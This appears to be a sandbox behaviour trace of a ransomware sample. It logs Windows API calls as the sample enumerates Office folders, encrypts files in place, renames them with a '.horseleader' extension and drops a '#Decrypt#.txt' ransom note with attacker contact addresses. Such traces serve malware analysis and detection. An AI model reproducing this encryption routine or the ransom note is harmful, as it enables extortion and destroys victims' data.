ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x112a3b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x112a3b30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="InfoPath.en-us", cAlternateFileName="INFOPA~1.EN-")) returned 1 [0244.418] lstrcmpiW (lpString1="InfoPath.en-us", lpString2="Windows") returned -1 [0244.418] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us") returned 98 [0244.419] lstrcmpW (lpString1="InfoPath.en-us", lpString2=".") returned 1 [0244.419] lstrcmpW (lpString1="InfoPath.en-us", lpString2="..") returned 1 [0244.419] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.419] GetProcessHeap () returned 0x780000 [0244.419] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0244.419] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\*") returned 100 [0244.419] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x112a3b30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x112a3b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x112a3b30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.420] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.420] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\.") returned 100 [0244.420] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.420] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x112a3b30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x112a3b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x112a3b30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="..", cAlternateFileName="")) returned 1 [0244.420] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.420] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\..") returned 101 [0244.420] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.420] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.420] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6e345a0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x112a3b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf6e345a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x4cf, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="InfoPathMUI.XML", cAlternateFileName="INFOPA~1.XML")) returned 1 [0244.420] lstrcmpiW (lpString1="InfoPathMUI.XML", lpString2="Windows") returned -1 [0244.420] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 114 [0244.420] StrStrIW (lpFirst="InfoPathMUI.XML", lpSrch=".horseleader") returned 0x0 [0244.420] lstrcmpW (lpString1="InfoPathMUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.420] lstrcmpW (lpString1="InfoPathMUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.420] lstrlenW (lpString=".testttjffg") returned 11 [0244.420] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.420] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.420] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.420] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.421] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 114 [0244.421] StrStrW (lpFirst="InfoPathMUI.XML", lpSrch=".txt") returned 0x0 [0244.421] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1231) returned 1 [0244.421] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x4cf, lpOverlapped=0x0) returned 1 [0244.423] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffb31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.423] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x4cf, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x4cf, lpOverlapped=0x0) returned 1 [0244.423] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.423] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.423] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.424] CloseHandle (hObject=0x15c) returned 1 [0244.424] GetProcessHeap () returned 0x780000 [0244.424] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.424] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.horseleader") returned 126 [0244.424] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml.horseleader")) returned 1 [0244.425] GetProcessHeap () returned 0x780000 [0244.425] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.425] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x112a3b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x73c, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.425] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.425] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 108 [0244.425] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.425] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.425] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.425] lstrlenW (lpString=".testttjffg") returned 11 [0244.425] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.425] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.425] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.425] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.426] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 108 [0244.426] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.426] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1852) returned 1 [0244.426] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x73c, lpOverlapped=0x0) returned 1 [0244.428] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.428] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x73c, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x73c, lpOverlapped=0x0) returned 1 [0244.428] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.428] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.429] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.429] CloseHandle (hObject=0x15c) returned 1 [0244.429] GetProcessHeap () returned 0x780000 [0244.429] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.429] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.horseleader") returned 120 [0244.429] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml.horseleader")) returned 1 [0244.430] GetProcessHeap () returned 0x780000 [0244.430] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.430] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x112a3b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x73c, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.430] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.430] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\#Decrypt#.txt") returned 112 [0244.430] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.432] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0244.432] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.434] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.434] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.434] CloseHandle (hObject=0x1a4) returned 1 [0244.434] GetProcessHeap () returned 0x780000 [0244.434] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0244.434] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe164800, ftCreationTime.dwHighDateTime=0x1cac048, ftLastAccessTime.dwLowDateTime=0x6b277670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe164800, ftLastWriteTime.dwHighDateTime=0x1cac048, nFileSizeHigh=0x0, nFileSizeLow=0x8b7b8, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="ODeploy.exe", cAlternateFileName="")) returned 1 [0244.434] lstrcmpiW (lpString1="ODeploy.exe", lpString2="Windows") returned -1 [0244.434] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe") returned 95 [0244.434] StrStrIW (lpFirst="ODeploy.exe", lpSrch=".horseleader") returned 0x0 [0244.435] lstrcmpW (lpString1="ODeploy.exe", lpString2="#Decrypt#.txt") returned 1 [0244.435] lstrcmpW (lpString1="ODeploy.exe", lpString2="_uninstalling_.png") returned 1 [0244.435] lstrlenW (lpString=".testttjffg") returned 11 [0244.435] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe", lpSrch=".testttjffg") returned 0x0 [0244.435] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0244.435] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0244.435] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\odeploy.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.435] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe") returned 95 [0244.435] StrStrW (lpFirst="ODeploy.exe", lpSrch=".txt") returned 0x0 [0244.435] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=571320) returned 1 [0244.435] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.436] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.438] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.438] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.446] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x433dc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.446] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.451] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.451] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.452] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x867b8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.452] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.454] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.454] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.455] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.455] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0244.456] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0244.456] CloseHandle (hObject=0x1a4) returned 1 [0244.460] GetProcessHeap () returned 0x780000 [0244.460] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0244.460] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe.horseleader") returned 107 [0244.460] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\odeploy.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\odeploy.exe.horseleader")) returned 1 [0244.464] GetProcessHeap () returned 0x780000 [0244.464] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0244.464] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc2600b20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc2600b20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Office.en-us", cAlternateFileName="OFFICE~1.EN-")) returned 1 [0244.464] 